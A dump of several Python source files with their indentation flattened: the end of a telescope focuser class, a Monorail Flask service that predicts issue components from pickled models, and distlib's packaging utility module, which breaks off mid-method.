self.autofocus_mask_dilations = autofocus_mask_dilations
self.autofocus_make_plots = bool(autofocus_make_plots)
def _add_fits_keywords(self, header):
header.set('FOC-NAME', self.name, 'Focuser name')
header.set('FOC-MOD', self.model, 'Focuser model')
header.set('FOC-ID', self.uid, 'Focuser serial number')
header.set('FOC-POS', self.position, 'Focuser position')
return header
def __str__(self):
try:
s = "{} ({}) on {}".format(self.name, self.uid, self.port)
except Exception:
s = str(__class__)
return s
|
service.py
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""Prediction service for Monorail.
"""
import logging
import os
import sklearn
import pickle
import json
import tempfile
import threading
import numpy as np
from googleapiclient import discovery
from googleapiclient import http
from oauth2client.client import GoogleCredentials
from flask import Flask, request, render_template
# These parameters determine the location of the model files on GCS.
#MODEL_TIME = 1473989566
MODEL_TIME = 1473288723
DIR_MODEL_TIME = 20170321
app = Flask(__name__)
# This should be set to true once the models are loaded and we're ready
# to serve requests.
ready = False
index_map, vectorizer, tfidf_transformer, clf = None, None, None, None
component_definition = None
vectorizer_dir, tfidf_transformer_dir, clf_dir = None, None, None
@app.route('/')
def text_area():
return render_template('comment.html')
@app.route('/_predict', methods=['POST'])
def predict():
text = request.form['text']
text = text.lower().strip()
counts = vectorizer.transform([text])
tfidf = tfidf_transformer.transform(counts)
predictions = clf.predict(tfidf)[0]
# Translate array of indices into actual list of components
predictions_path = []
for index in np.where(predictions)[0]:
predictions_path.append(index_map[index])
return json.dumps({'components': predictions_path})
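# Illustrative client call for the /_predict endpoint above (a sketch, not part
# of the service; the host, port and returned component are assumptions):
#
#     import requests
#     resp = requests.post('http://localhost:5000/_predict',
#                          data={'text': 'Crash when opening the settings page'})
#     resp.json()  # e.g. {'components': ['UI>Settings']}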
@app.route('/_predict_dir', methods=['POST'])
def predict_dir():
predictions_path = []
dir_paths = request.form['text']
dir_paths = dir_paths.split(',')
counts_dir = vectorizer_dir.transform(dir_paths)
tfidf_dir = tfidf_transformer_dir.transform(counts_dir)
prediction_result = clf_dir.predict(tfidf_dir)
for input_i in range(len(prediction_result)):
# Indices of the labels predicted for this input; use a distinct name inside
# the comprehension instead of reusing the outer loop variable.
tmp_prediction_index = [label_index for label_index, predict_label
in enumerate(prediction_result[input_i])
if predict_label == 1]
tmp_prediction_component = []
for tmp_index in tmp_prediction_index:
tmp_prediction_component.append(component_definition[tmp_index])
predictions_path.append(tmp_prediction_component)
return json.dumps({'components': predictions_path})
# Used by GAE Custom Flexible Runtime
@app.route('/_log', methods=['GET'])
def log():
# TODO: more detailed logging. For now we can just look at the
# GET request parameters.
return 'ok'
# Used by GAE Custom Flexible Runtime
@app.route('/_ah/start')
def start():
return 'ok'
# Used by GAE Custom Flexible Runtime
@app.route('/_ah/stop')
def stop():
return 'ok'
# Used by GAE Custom Flexible Runtime
@app.route('/_ah/health')
def health():
if ready:
return 'ok'
else:
return '', 503 # HTTP_503_SERVICE_UNAVAILABLE
# Used by GAE Custom Flexible Runtime
@app.route('/_ah/background')
def background():
return 'ok'
# CORS support.
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Headers',
'Content-Type,Authorization')
response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE')
return response
@app.errorhandler(500)
def server_error(e):
# Log the error and stacktrace.
logging.exception('An error occurred during a request: %s.', e)
return 'An internal error occurred.', 500
def create_service():
# Get the application default credentials. When running locally, these are
# available after running `gcloud init`. When running on compute
# engine, these are available from the environment.
credentials = GoogleCredentials.get_application_default()
# Construct the service object for interacting with the Cloud Storage API -
# the 'storage' service, at version 'v1'.
# You can browse other available api services and versions here:
# http://g.co/dev/api-client-library/python/apis/
return discovery.build('storage', 'v1', credentials=credentials)
def get_object(bucket, filename, out_file):
service = create_service()
# Use get_media instead of get to get the actual contents of the object.
# http://g.co/dev/resources/api-libraries/documentation/storage/v1/python/latest/storage_v1.objects.html#get_media
req = service.objects().get_media(bucket=bucket, object=filename)
downloader = http.MediaIoBaseDownload(out_file, req,
chunksize=100*1024*1024)
done = False
while done is False:
status, done = downloader.next_chunk()
print("Download {}%.".format(int(status.progress() * 100)))
return out_file
def get_model(bucket, filename):
print(filename)
print('Fetching object..')
# TODO: retries on errors. GCS doesn't always work.
with tempfile.NamedTemporaryFile(mode='w+b') as tmpfile:
get_object(bucket, filename, out_file=tmpfile)
tmpfile.seek(0)
model = pickle.load(tmpfile)
return model
@app.before_first_request
def load_data():
bucket_name = os.environ.get('GCLOUD_PROJECT')
global ready, index_map, vectorizer, tfidf_transformer, clf
index_map = get_model(bucket_name,
'issue_model/{}-index-map.pkl'.format(MODEL_TIME))
vectorizer = get_model(bucket_name,
'issue_model/{}-vectorizer.pkl'.format(MODEL_TIME))
tfidf_transformer = get_model(bucket_name,
'issue_model/{}-transformer.pkl'.format(
MODEL_TIME))
clf = get_model(bucket_name, 'issue_model/{}-classifier.pkl'.format(
MODEL_TIME))
# Load directory component prediction model
global ready, component_definition, vectorizer_dir
global tfidf_transformer_dir, clf_dir
component_definition = get_model(bucket_name,
'dir_model/{}-component_def.pkl'.format(
DIR_MODEL_TIME))
vectorizer_dir = get_model(bucket_name,
'dir_model/{}-vectorizer.pkl'.format(
DIR_MODEL_TIME))
tfidf_transformer_dir = get_model(bucket_name,
'dir_model/{}-transformer.pkl'.format(
DIR_MODEL_TIME))
clf_dir = get_model(bucket_name,
'dir_model/{}-classifier.pkl'.format(DIR_MODEL_TIME))
ready = True
loading_thread = threading.Thread(target=load_data)
if __name__ == '__main__':
# Start loading model data, but also start serving right away so we
# can respond to _ah/health requests with 503s rather than appearing to
# not have started at all.
loading_thread.start()
app.run(host='0.0.0.0', port='5000')
|
util.py
|
#
# Copyright (C) 2012-2017 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import socket
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
import subprocess
import sys
import tarfile
import tempfile
import textwrap
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (
string_types,
text_type,
shutil,
raw_input,
StringIO,
cache_from_source,
urlopen,
urljoin,
httplib,
xmlrpclib,
splittype,
HTTPHandler,
BaseConfigurator,
valid_ident,
Container,
configparser,
URLError,
ZipFile,
fsdecode,
unquote,
urlparse,
)
logger = logging.getLogger(__name__)
#
# Requirement parsing code as per PEP 508
#
IDENTIFIER = re.compile(r"^([\w\.-]+)\s*")
VERSION_IDENTIFIER = re.compile(r"^([\w\.*+-]+)\s*")
COMPARE_OP = re.compile(r"^(<=?|>=?|={2,3}|[~!]=)\s*")
MARKER_OP = re.compile(r"^((<=?)|(>=?)|={2,3}|[~!]=|in|not\s+in)\s*")
OR = re.compile(r"^or\b\s*")
AND = re.compile(r"^and\b\s*")
NON_SPACE = re.compile(r"(\S+)\s*")
STRING_CHUNK = re.compile(r"([\s\w\.{}()*+#:;,/?!~`@$%^&=|<>\[\]-]+)")
def parse_marker(marker_string):
"""
Parse a marker string and return a dictionary containing a marker expression.
The dictionary will contain keys "op", "lhs" and "rhs" for non-terminals in
the expression grammar, or strings. A string contained in quotes is to be
interpreted as a literal string, and a string not contained in quotes is a
variable (such as os_name).
"""
def marker_var(remaining):
# either identifier, or literal string
m = IDENTIFIER.match(remaining)
if m:
result = m.groups()[0]
remaining = remaining[m.end() :]
elif not remaining:
raise SyntaxError("unexpected end of input")
else:
q = remaining[0]
if q not in "'\"":
raise SyntaxError("invalid expression: %s" % remaining)
oq = "'\"".replace(q, "")
remaining = remaining[1:]
parts = [q]
while remaining:
# either a string chunk, or oq, or q to terminate
if remaining[0] == q:
break
elif remaining[0] == oq:
parts.append(oq)
remaining = remaining[1:]
else:
m = STRING_CHUNK.match(remaining)
if not m:
raise SyntaxError("error in string literal: %s" % remaining)
parts.append(m.groups()[0])
remaining = remaining[m.end() :]
else:
s = "".join(parts)
raise SyntaxError("unterminated string: %s" % s)
parts.append(q)
result = "".join(parts)
remaining = remaining[1:].lstrip() # skip past closing quote
return result, remaining
def marker_expr(remaining):
if remaining and remaining[0] == "(":
result, remaining = marker(remaining[1:].lstrip())
if remaining[0] != ")":
raise SyntaxError("unterminated parenthesis: %s" % remaining)
remaining = remaining[1:].lstrip()
else:
lhs, remaining = marker_var(remaining)
while remaining:
m = MARKER_OP.match(remaining)
if not m:
break
op = m.groups()[0]
remaining = remaining[m.end() :]
rhs, remaining = marker_var(remaining)
lhs = {"op": op, "lhs": lhs, "rhs": rhs}
result = lhs
return result, remaining
def marker_and(remaining):
lhs, remaining = marker_expr(remaining)
while remaining:
m = AND.match(remaining)
if not m:
break
remaining = remaining[m.end() :]
rhs, remaining = marker_expr(remaining)
lhs = {"op": "and", "lhs": lhs, "rhs": rhs}
return lhs, remaining
def marker(remaining):
lhs, remaining = marker_and(remaining)
while remaining:
m = OR.match(remaining)
if not m:
break
remaining = remaining[m.end() :]
rhs, remaining = marker_and(remaining)
lhs = {"op": "or", "lhs": lhs, "rhs": rhs}
return lhs, remaining
return marker(marker_string)
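# Example of the value returned by parse_marker() (a sketch following the
# grammar above; quoted literals keep their quotes, and the second element of
# the tuple is the unparsed remainder):
#
#     >>> parse_marker("python_version >= '3.6' and os_name == 'posix'")
#     ({'op': 'and',
#       'lhs': {'op': '>=', 'lhs': 'python_version', 'rhs': "'3.6'"},
#       'rhs': {'op': '==', 'lhs': 'os_name', 'rhs': "'posix'"}}, '')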
def parse_requirement(req):
"""
Parse a requirement passed in as a string. Return a Container
whose attributes contain the various parts of the requirement.
"""
remaining = req.strip()
if not remaining or remaining.startswith("#"):
return None
m = IDENTIFIER.match(remaining)
if not m:
raise SyntaxError("name expected: %s" % remaining)
distname = m.groups()[0]
remaining = remaining[m.end() :]
extras = mark_expr = versions = uri = None
if remaining and remaining[0] == "[":
i = remaining.find("]", 1)
if i < 0:
raise SyntaxError("unterminated extra: %s" % remaining)
s = remaining[1:i]
remaining = remaining[i + 1 :].lstrip()
extras = []
while s:
m = IDENTIFIER.match(s)
if not m:
raise SyntaxError("malformed extra: %s" % s)
extras.append(m.groups()[0])
s = s[m.end() :]
if not s:
break
if s[0] != ",":
raise SyntaxError("comma expected in extras: %s" % s)
s = s[1:].lstrip()
if not extras:
extras = None
if remaining:
if remaining[0] == "@":
# it's a URI
remaining = remaining[1:].lstrip()
m = NON_SPACE.match(remaining)
if not m:
raise SyntaxError("invalid URI: %s" % remaining)
uri = m.groups()[0]
t = urlparse(uri)
# there are issues with Python and URL parsing, so this test
# is a bit crude. See bpo-20271, bpo-23505. Python doesn't
# always parse invalid URLs correctly - it should raise
# exceptions for malformed URLs
if not (t.scheme and t.netloc):
raise SyntaxError("Invalid URL: %s" % uri)
remaining = remaining[m.end() :].lstrip()
else:
def get_versions(ver_remaining):
"""
Return a list of operator, version tuples if any are
specified, else None.
"""
m = COMPARE_OP.match(ver_remaining)
versions = None
if m:
versions = []
while True:
op = m.groups()[0]
ver_remaining = ver_remaining[m.end() :]
m = VERSION_IDENTIFIER.match(ver_remaining)
if not m:
raise SyntaxError("invalid version: %s" % ver_remaining)
v = m.groups()[0]
versions.append((op, v))
ver_remaining = ver_remaining[m.end() :]
if not ver_remaining or ver_remaining[0] != ",":
break
ver_remaining = ver_remaining[1:].lstrip()
m = COMPARE_OP.match(ver_remaining)
if not m:
raise SyntaxError("invalid constraint: %s" % ver_remaining)
if not versions:
versions = None
return versions, ver_remaining
if remaining[0] != "(":
versions, remaining = get_versions(remaining)
else:
i = remaining.find(")", 1)
if i < 0:
raise SyntaxError("unterminated parenthesis: %s" % remaining)
s = remaining[1:i]
remaining = remaining[i + 1 :].lstrip()
# As a special diversion from PEP 508, allow a version number
# a.b.c in parentheses as a synonym for ~= a.b.c (because this
# is allowed in earlier PEPs)
if COMPARE_OP.match(s):
versions, _ = get_versions(s)
else:
m = VERSION_IDENTIFIER.match(s)
if not m:
raise SyntaxError("invalid constraint: %s" % s)
v = m.groups()[0]
s = s[m.end() :].lstrip()
if s:
raise SyntaxError("invalid constraint: %s" % s)
versions = [("~=", v)]
if remaining:
if remaining[0] != ";":
raise SyntaxError("invalid requirement: %s" % remaining)
remaining = remaining[1:].lstrip()
mark_expr, remaining = parse_marker(remaining)
if remaining and remaining[0] != "#":
raise SyntaxError("unexpected trailing data: %s" % remaining)
if not versions:
rs = distname
else:
rs = "%s %s" % (distname, ", ".join(["%s %s" % con for con in versions]))
return Container(
name=distname,
extras=extras,
constraints=versions,
marker=mark_expr,
url=uri,
requirement=rs,
)
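# Illustrative use of parse_requirement() (a sketch; the attribute values
# follow from the parsing code above):
#
#     >>> r = parse_requirement("requests[security] >= 2.8.1, == 2.8.*")
#     >>> r.name, r.extras, r.constraints
#     ('requests', ['security'], [('>=', '2.8.1'), ('==', '2.8.*')])
#     >>> r.requirement
#     'requests >= 2.8.1, == 2.8.*'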
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(root, path):
# normalizes and returns a lstripped-/-separated path
root = root.replace(os.path.sep, "/")
path = path.replace(os.path.sep, "/")
assert path.startswith(root)
return path[len(root) :].lstrip("/")
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, "/").rstrip("/")
destinations[resource_file] = rel_dest + "/" + rel_path
return destinations
def in_venv():
if hasattr(sys, "real_prefix"):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, "base_prefix", sys.prefix)
return result
def get_executable():
# The __PYVENV_LAUNCHER__ dance is apparently no longer needed, as
# changes to the stub launcher mean that sys.executable always points
# to the stub on OS X
# if sys.platform == 'darwin' and ('__PYVENV_LAUNCHER__'
# in os.environ):
# result = os.environ['__PYVENV_LAUNCHER__']
# else:
# result = sys.executable
# return result
result = os.path.normcase(sys.executable)
if not isinstance(result, text_type):
result = fsdecode(result)
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = "%c: %s\n%s" % (c, error_prompt, prompt)
return c
def extract_by_key(d, keys):
if isinstance(keys, string_types):
keys = keys.split()
result = {}
for key in keys:
if key in d:
result[key] = d[key]
return result
def read_exports(stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader("utf-8")(stream)
# Try to load as JSON, falling back on legacy format
data = stream.read()
stream = StringIO(data)
try:
jdata = json.load(stream)
result = jdata["extensions"]["python.exports"]["exports"]
for group, entries in result.items():
for k, v in entries.items():
s = "%s = %s" % (k, v)
entry = get_export_entry(s)
assert entry is not None
entries[k] = entry
return result
except Exception:
stream.seek(0, 0)
def read_stream(cp, stream):
if hasattr(cp, "read_file"):
cp.read_file(stream)
else:
cp.readfp(stream)
cp = configparser.ConfigParser()
try:
read_stream(cp, stream)
except configparser.MissingSectionHeaderError:
stream.close()
data = textwrap.dedent(data)
stream = StringIO(data)
read_stream(cp, stream)
result = {}
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = "%s = %s" % (name, value)
entry = get_export_entry(s)
assert entry is not None
# entry.dist = self
entries[name] = entry
return result
def write_exports(exports, stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getwriter("utf-8")(stream)
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = "%s:%s" % (entry.prefix, entry.suffix)
if entry.flags:
s = "%s [%s]" % (s, ", ".join(entry.flags))
cp.set(k, entry.name, s)
cp.write(stream)
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
# for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, cls=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
# obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == "/":
return pathname
if not pathname:
return pathname
if pathname[0] == "/":
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == "/":
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split("/")
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
than 'source'. Raise PackagingFileError if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" % os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile, check=True):
"""Copy a file respecting dry-run and force flags.
"""
self.ensure_dir(os.path.dirname(outfile))
logger.info("Copying %s to %s", infile, outfile)
if not self.dry_run:
msg = None
if check:
if os.path.islink(outfile):
msg = "%s is a symlink" % outfile
elif os.path.exists(outfile) and not os.path.isfile(outfile):
msg = "%s is a non-regular file" % outfile
if msg:
raise ValueError(msg + " which would be overwritten")
shutil.copyfile(infile, outfile)
self.record_as_written(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info("Copying stream %s to %s", instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, "wb")
else:
outstream = codecs.open(outfile, "w", encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
self.record_as_written(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, "wb") as f:
f.write(data)
self.record_as_written(path)
def write_text_file(self, path, data, encoding):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, "wb") as f:
f.write(data.encode(encoding))
self.record_as_written(path)
def set_mode(self, bits, mask, files):
if os.name == "posix" or (os.name == "java" and os._name == "posix"):
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info("Creating %s" % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(self, path, optimize=False, force=False, prefix=None):
dpath = cache_from_source(path, not optimize)
logger.info("Byte-compiling %s to %s", path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix) :]
py_compile.compile(path, dpath, diagpath, True) # raise error
self.record_as_written(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug("Removing directory tree at %s", path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = "link"
else:
s = "file"
logger.debug("Removing %s %s", s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ["__pycache__"]
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split(".")
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self): # pragma: no cover
return "<ExportEntry %s = %s:%s %s>" % (
self.name,
self.prefix,
self.suffix,
self.flags,
)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (
self.name == other.name
and self.prefix == other.prefix
and self.suffix == other.suffix
and self.flags == other.flags
)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(
r"""(?P<name>(\w|[-.+])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
""",
re.VERBOSE,
)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if "[" in specification or "]" in specification:
raise DistlibException("Invalid specification " "'%s'" % specification)
else:
d = m.groupdict()
name = d["name"]
path = d["callable"]
colons = path.count(":")
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException("Invalid specification " "'%s'" % specification)
prefix, suffix = path.split(":")
flags = d["flags"]
if flags is None:
if "[" in specification or "]" in specification:
raise DistlibException("Invalid specification " "'%s'" % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(",")]
result = ExportEntry(name, prefix, suffix, flags)
return result
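# For example (a sketch; the identifiers are made up):
#
#     >>> e = get_export_entry('console = mypkg.cli:main [extra1, extra2]')
#     >>> e.name, e.prefix, e.suffix, e.flags
#     ('console', 'mypkg.cli', 'main', ['extra1', 'extra2'])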
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
directory - using os.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = ".distlib"
if os.name == "nt" and "LOCALAPPDATA" in os.environ:
result = os.path.expandvars("$localappdata")
else:
# Assume posix, or old Windows
result = os.path.expanduser("~")
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if os.path.isdir(result):
usable = os.access(result, os.W_OK)
if not usable:
logger.warning("Directory exists but is not writable: %s", result)
else:
try:
os.makedirs(result)
usable = True
except OSError:
logger.warning("Unable to create %s", result, exc_info=True)
usable = False
if not usable:
result = tempfile.mkdtemp()
logger.warning("Default location unusable, using %s", result)
return os.path.join(result, suffix)
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(":", "---")
p = p.replace(os.sep, "--")
return d + p + ".cache"
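# For example, on a POSIX system (on Windows a drive like 'C:' becomes 'C---'):
#
#     >>> path_to_cache_dir('/home/user/lib/python')
#     '--home--user--lib--python.cache'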
def ensure_slash(s):
if not s.endswith("/"):
return s + "/"
return s
def parse_credentials(netloc):
username = password = None
if "@" in netloc:
prefix, netloc = netloc.split("@", 1)
if ":" not in prefix:
username = prefix
else:
username, password = prefix.split(":", 1)
return username, password, netloc
def get_process_umask():
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile(
"([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-" "([a-z0-9_.+-]+)", re.I
)
PYTHON_VERSION = re.compile(r"-py(\d\.?\d?)")
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
filename = unquote(filename).replace(" ", "-")
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[: m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r"\b", filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1 :], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
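# A couple of illustrative inputs (results follow from the regexes above):
#
#     >>> split_filename('python-dateutil-2.8.2')
#     ('python-dateutil', '2.8.2', None)
#     >>> split_filename('Django-3.2-py3.6', project_name='Django')
#     ('Django', '3.2', '3.6')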
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r"(?P<name>[\w .-]+)\s*" r"\(\s*(?P<ver>[^\s)]+)\)$")
def parse_name_and_version(p):
"""
A utility method used to get name and version from a string.
From e.g. a Provides-Dist value.
:param p: A value in a form 'foo (1.0)'
:return: The name and version as a tuple.
"""
m = NAME_VERSION_RE.match(p)
if not m:
raise DistlibException("Ill-formed name/version string: '%s'" % p)
d = m.groupdict()
return d["name"].strip().lower(), d["ver"]
def get_extras(requested, available):
result = set()
requested = set(requested or [])
available = set(available or [])
if "*" in requested:
requested.remove("*")
result |= available
for r in requested:
if r == "-":
result.add(r)
elif r.startswith("-"):
unwanted = r[1:]
if unwanted not in available:
logger.warning("undeclared extra: %s" % unwanted)
if unwanted in result:
result.remove(unwanted)
else:
if r not in available:
logger.warning("undeclared extra: %s" % r)
result.add(r)
return result
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
ct = headers.get("Content-Type")
if not ct.startswith("application/json"):
logger.debug("Unexpected response for JSON request: %s", ct)
else:
reader = codecs.getreader("utf-8")(resp)
# data = reader.read().decode('utf-8')
# result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception("Failed to get external data for %s: %s", url, e)
return result
_external_data_base_url = "https://www.red-dove.com/pypi/projects/"
def get_project_data(name):
url = "%s/%s/project.json" % (name[0].upper(), name)
url = urljoin(_external_data_base_url, url)
result = _get_external_data(url)
return result
def get_package_data(name, version):
url = "%s/%s/package-%s.json" % (name[0].upper(), name, version)
url = urljoin(_external_data_base_url, url)
return _get_external_data(url)
class Cache(object):
"""
A class implementing a cache for resources that need to live in the file system
e.g. shared libraries. This class was moved from resources to here because it
could be used by other modules, e.g. the wheel module.
"""
def __init__(self, base):
"""
Initialise an instance.
:param base: The base directory where the cache should be located.
"""
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if not os.path.isdir(base): # pragma: no cover
os.makedirs(base)
if (os.stat(base).st_mode & 0o77) != 0:
logger.warning("Directory '%s' is not private", base)
self.base = os.path.abspath(os.path.normpath(base))
def prefix_to_dir(self, prefix):
"""
Converts a resource prefix to a directory name in the cache.
"""
return path_to_cache_dir(prefix)
def clear(self):
"""
Clear the cache.
"""
not_removed = []
for fn in os.listdir(self.base):
fn = os.path.join(self.base, fn)
try:
if os.path.islink(fn) or os.path.isfile(fn):
os.remove(fn)
elif os.path.isdir(fn):
shutil.rmtree(fn)
except Exception:
not_removed.append(fn)
return not_removed
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
